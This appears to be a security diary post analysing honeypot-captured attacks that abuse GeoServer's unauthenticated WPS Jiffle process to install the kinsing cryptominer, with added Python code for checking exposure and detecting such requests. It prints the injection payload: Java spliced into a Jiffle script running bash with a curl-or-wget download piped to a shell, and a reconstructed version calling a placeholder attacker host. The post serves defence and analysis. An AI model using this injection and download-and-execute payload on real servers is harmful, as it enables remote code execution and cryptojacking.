Geoserver Attack Details: More Cryptominers against Unconfigured WebApps

Published: 2023-06-12
Last Updated: 2023-06-12 12:46:13 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)

[Figure: code snippet from the exploit request showing the code that downloads via curl]

Last week, I noted increased scans against "GeoServer" [1]. GeoServer is an open-source Java application with a simple web-based interface to share geospatial data like maps [2].

[Graph: increase in scans against GeoServer]

I followed our usual playbook of redirecting these scans to an instance of GeoServer. GeoServer has had a few vulnerabilities in the past, so I installed an older version to verify whether one of them was being exploited. However, it looks like a vulnerability wasn't necessary. Instead, similar to what we have seen with NiFi recently, the attacker is just using a built-in code execution feature, and the default install, as deployed by me, did not require credentials to reach it.
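A quick way to check your own deployment for the condition described above is to ask the WPS endpoint for its capabilities without any credentials and see whether a script-executing process such as Jiffle is offered. The following is an added example, not code from this diary or from the GeoServer project. The GetCapabilities URL and the element names are the standard OGC WPS 1.0.0 ones that GeoServer serves under /geoserver/ows; the capabilities document embedded below is constructed for the example, and the identifier "ras:Jiffle" is assumed to be the one GeoServer uses for the "Jiffle map algebra" process named in the response later in this post.

```python
"""Check whether a GeoServer instance offers WPS, and the Jiffle process in
particular, to an unauthenticated client.

Added example; not code from the ISC diary or from GeoServer. The sample
capabilities document is constructed, and "ras:Jiffle" is an assumed
process identifier.
"""
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

WPS_NS = "http://www.opengis.net/wps/1.0.0"
OWS_NS = "http://www.opengis.net/ows/1.1"

# Constructed sample response: two offered processes, one of them Jiffle.
SAMPLE_CAPABILITIES = f"""<?xml version="1.0" encoding="UTF-8"?>
<wps:Capabilities xmlns:wps="{WPS_NS}" xmlns:ows="{OWS_NS}" service="WPS" version="1.0.0">
  <wps:ProcessOfferings>
    <wps:Process wps:processVersion="1.0.0">
      <ows:Identifier>ras:Jiffle</ows:Identifier>
      <ows:Title>Jiffle map algebra</ows:Title>
      <ows:Abstract>Map algebra powered by Jiffle</ows:Abstract>
    </wps:Process>
    <wps:Process wps:processVersion="1.0.0">
      <ows:Identifier>geo:buffer</ows:Identifier>
      <ows:Title>Buffer</ows:Title>
    </wps:Process>
  </wps:ProcessOfferings>
</wps:Capabilities>"""

# Processes that compile a caller-supplied script into executable code.
# Only Jiffle is named on the diary page; extend this for your own deployment.
SCRIPT_PROCESSES = {"ras:Jiffle"}  # assumed identifier


def capabilities_url(base_url):
    """Build the anonymous WPS GetCapabilities URL for a GeoServer base URL."""
    query = urllib.parse.urlencode(
        {"service": "WPS", "version": "1.0.0", "request": "GetCapabilities"}
    )
    return base_url.rstrip("/") + "/ows?" + query


def list_processes(capabilities_xml):
    """Return [(identifier, title), ...] from a WPS 1.0.0 capabilities document."""
    data = capabilities_xml.encode() if isinstance(capabilities_xml, str) else capabilities_xml
    root = ET.fromstring(data)
    processes = []
    for proc in root.iter(f"{{{WPS_NS}}}Process"):
        ident = proc.findtext(f"{{{OWS_NS}}}Identifier", default="").strip()
        title = proc.findtext(f"{{{OWS_NS}}}Title", default="").strip()
        processes.append((ident, title))
    return processes


def risky_processes(capabilities_xml):
    """Processes that turn attacker-supplied scripts into code. Anyone who can
    reach Execute for one of these can run commands, as the captured request does."""
    return [
        (ident, title)
        for ident, title in list_processes(capabilities_xml)
        if ident in SCRIPT_PROCESSES or "jiffle" in title.lower()
    ]


def check_live(base_url, timeout=10):
    """Fetch capabilities with no credentials and report exposed script processes.
    Needs network access; the offline sample above does not exercise it."""
    req = urllib.request.Request(
        capabilities_url(base_url), headers={"User-Agent": "wps-exposure-check"}
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read()
    return risky_processes(body)


if __name__ == "__main__":
    print(capabilities_url("http://localhost:8080/geoserver"))
    for ident, title in risky_processes(SAMPLE_CAPABILITIES):
        print(f"exposed script process: {ident} ({title})")
```

If an anonymous GetCapabilities succeeds and lists Jiffle, an anonymous Execute most likely succeeds too, which is exactly the situation the honeypot reproduced. Restricting the WPS service to authenticated roles through GeoServer's service-level security, or not installing the WPS extension where it is not needed, closes that path.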

GeoServer was installed in a Docker container, which prevented any actual execution of the attack code: the container did not provide tools like curl to download the additional payload. Instead, I downloaded the payloads manually later.

Soon after I configured the honeypot, several exploit requests arrived. These requests took advantage of the Web Processing Service (WPS). I highlighted some of the relevant features in the request below:

POST /geoserver/wms HTTP/1.1
Host: [honeypot ip address]:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 2261
Content-Type: application/xml
Accept-Encoding: gzip


<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="" xmlns="" xmlns:wfs="" xmlns:wps="" xmlns:ows="" xmlns:gml="" xmlns:ogc="" xmlns:wcs="" xmlns:xlink="" xsi:schemaLocation="">
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { reader = new String[]{"/bin/bash","-c","(curl -s||wget -q -O-|bash"}).getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch ( e) {} }} /**</wps:LiteralData>
<wps:RawDataOutput mimeType="image/tiff">

The request uses the "Execute" operation, which can be used to "perform the process with specified input values and required output data items" [3]. The process being executed is GeoServer's "Jiffle map algebra" (named in the response below), and the script in the LiteralData element is not plain Jiffle: after one harmless statement it inserts a "// */" marker, declares a Java class named Double with a static initializer, and ends with "/**". Jiffle scripts are compiled to Java, and these markers splice the attacker's class into the generated source. The static initializer runs "/bin/bash -c" with a one-liner that uses curl, falling back to wget, to retrieve a script and pipe it straight into bash. It then reads the command's output and deliberately throws a RuntimeException containing it, which is why the command output shows up in the error text of the WPS response. The "bash" request itself is pretty simple; it uses curl to retrieve and execute additional code.
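For anyone who wants to pick this pattern out of captured traffic or proxy logs, the following added example (not code from this diary or from GeoServer) parses the XML body of a WPS Execute request and reports the indicators visible in the request above: a Java class declaration and static initializer inside a Jiffle script, the comment markers used to splice it in, process spawning, a downloader, and a pipe into a shell. The sample request is constructed for the example; the attacker's URLs were stripped from the page and are replaced with a placeholder, the namespace URIs are the standard OGC ones, and the input identifiers "coverage" and "script" are assumed.

```python
"""Flag WPS Execute requests that smuggle Java into a Jiffle script.

Added example; not code from the ISC diary or from GeoServer. The sample
request is constructed: URLs are placeholders and the input identifiers
are assumed.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the captured request; not the original.
SAMPLE_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
    xmlns:wps="http://www.opengis.net/wps/1.0.0"
    xmlns:ows="http://www.opengis.net/ows/1.1">
  <ows:Identifier>ras:Jiffle</ows:Identifier>
  <wps:DataInputs>
    <wps:Input>
      <ows:Identifier>coverage</ows:Identifier>
      <wps:Data><wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData></wps:Data>
    </wps:Input>
    <wps:Input>
      <ows:Identifier>script</ows:Identifier>
      <wps:Data><wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","(curl -s http://attacker.invalid/gs.sh||wget -q -O- http://attacker.invalid/gs.sh)|bash"}); } catch (Exception e) {} } } /**</wps:LiteralData></wps:Data>
    </wps:Input>
  </wps:DataInputs>
  <wps:ResponseForm>
    <wps:RawDataOutput mimeType="image/tiff"><ows:Identifier>result</ows:Identifier></wps:RawDataOutput>
  </wps:ResponseForm>
</wps:Execute>"""

# Constructed benign request: an ordinary Jiffle expression, nothing else.
BENIGN_REQUEST = """<wps:Execute version="1.0.0" service="WPS"
    xmlns:wps="http://www.opengis.net/wps/1.0.0"
    xmlns:ows="http://www.opengis.net/ows/1.1">
  <ows:Identifier>ras:Jiffle</ows:Identifier>
  <wps:DataInputs><wps:Input><ows:Identifier>script</ows:Identifier>
    <wps:Data><wps:LiteralData>dest = src * 2;</wps:LiteralData></wps:Data>
  </wps:Input></wps:DataInputs>
</wps:Execute>"""

# Each indicator is something a legitimate map-algebra script has no reason to contain.
INDICATORS = [
    ("java-class-in-script", re.compile(r"\bpublic\s+class\b|\bstatic\s*\{")),
    ("comment-break", re.compile(r"//\s*\*/|/\*\*\s*$")),
    ("process-spawn", re.compile(r"Runtime\.getRuntime\(\)|ProcessBuilder|/bin/(ba)?sh")),
    ("downloader", re.compile(r"\b(curl|wget)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(ba)?sh\b")),
]


def _local(tag):
    """Strip the namespace from an ElementTree tag so matching works whatever prefixes are used."""
    return tag.rsplit("}", 1)[-1]


def analyze_execute(body):
    """Parse a request body; return the process identifier and the indicators found in its inputs."""
    data = body.encode() if isinstance(body, str) else body
    root = ET.fromstring(data)
    if _local(root.tag) != "Execute":
        return {"is_wps_execute": False, "process": None, "findings": []}
    # The process identifier is the Identifier child of Execute itself, not of an Input.
    process = next(
        (c.text.strip() for c in root if _local(c.tag) == "Identifier" and c.text), None
    )
    findings = set()
    for el in root.iter():
        if _local(el.tag) in ("LiteralData", "ComplexData"):
            text = el.text or ""
            findings.update(name for name, rx in INDICATORS if rx.search(text))
    return {"is_wps_execute": True, "process": process, "findings": sorted(findings)}


def verdict(body):
    """One-line triage result for a request body."""
    r = analyze_execute(body)
    if not r["is_wps_execute"]:
        return "not a WPS Execute request"
    if {"java-class-in-script", "process-spawn"} & set(r["findings"]):
        return f"code injection via {r['process']}: " + ", ".join(r["findings"])
    if r["findings"]:
        return f"suspicious input for {r['process']}: " + ", ".join(r["findings"])
    return f"plain Execute for {r['process']}"


if __name__ == "__main__":
    print(verdict(SAMPLE_REQUEST))
    print(verdict(BENIGN_REQUEST))
```

Matching on local element names rather than prefixes matters here: the captured request binds its own prefixes, and a scanner keyed to "wps:LiteralData" literally would miss a body that used different ones. Running this over the honeypot's request would report the process as Jiffle and all five indicators.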

Due to the restrictions of the Docker install of GeoServer, the execution failed, and the following response was returned:

<?xml version="1.0" encoding="UTF-8"?>
<wps:ExecuteResponse xmlns:xs="" xmlns:ows="" xmlns:wps="" xmlns:xlink="" xml:lang="en" service="WPS" serviceInstance="http://[honeypot ip address]:8080/geoserver/ows?" version="1.0.0">
<wps:Process wps:processVersion="1.0.0">
<ows:Title>Jiffle map algebra</ows:Title>
<ows:Abstract>Map algebra powered by Jiffle</ows:Abstract></wps:Process>
<wps:Status creationTime="2023-06-09T04:18:57.977Z"><wps:ProcessFailed><ows:ExceptionReport version="1.1.0"><ows:Exception exceptionCode="NoApplicableCode"><ows:ExceptionText>

Process failed during execution
java.lang.ExceptionInInitializerError - found curl/etc/kinsingwget is curl -not found /dev/etc/kinsing not exists/etc/kinsing after download exists and checked/etc/ not exists/etc/ after download not exists/etc/ after download2 not exists
Running as root

Looking at "" reveals a script almost identical to the "" script I wrote about concerning the attacks against NiFi. Both scripts use the same host ( to retrieve the or the script. Taking a look at other scans from related IPs, it looks like they are also attempting to exploit a Confluence/Nashorn issue [4].

The goal for all of these attacks appears to be to install the "kinsing" crypto miner.


Johannes B. Ullrich, Ph.D., Dean of Research,
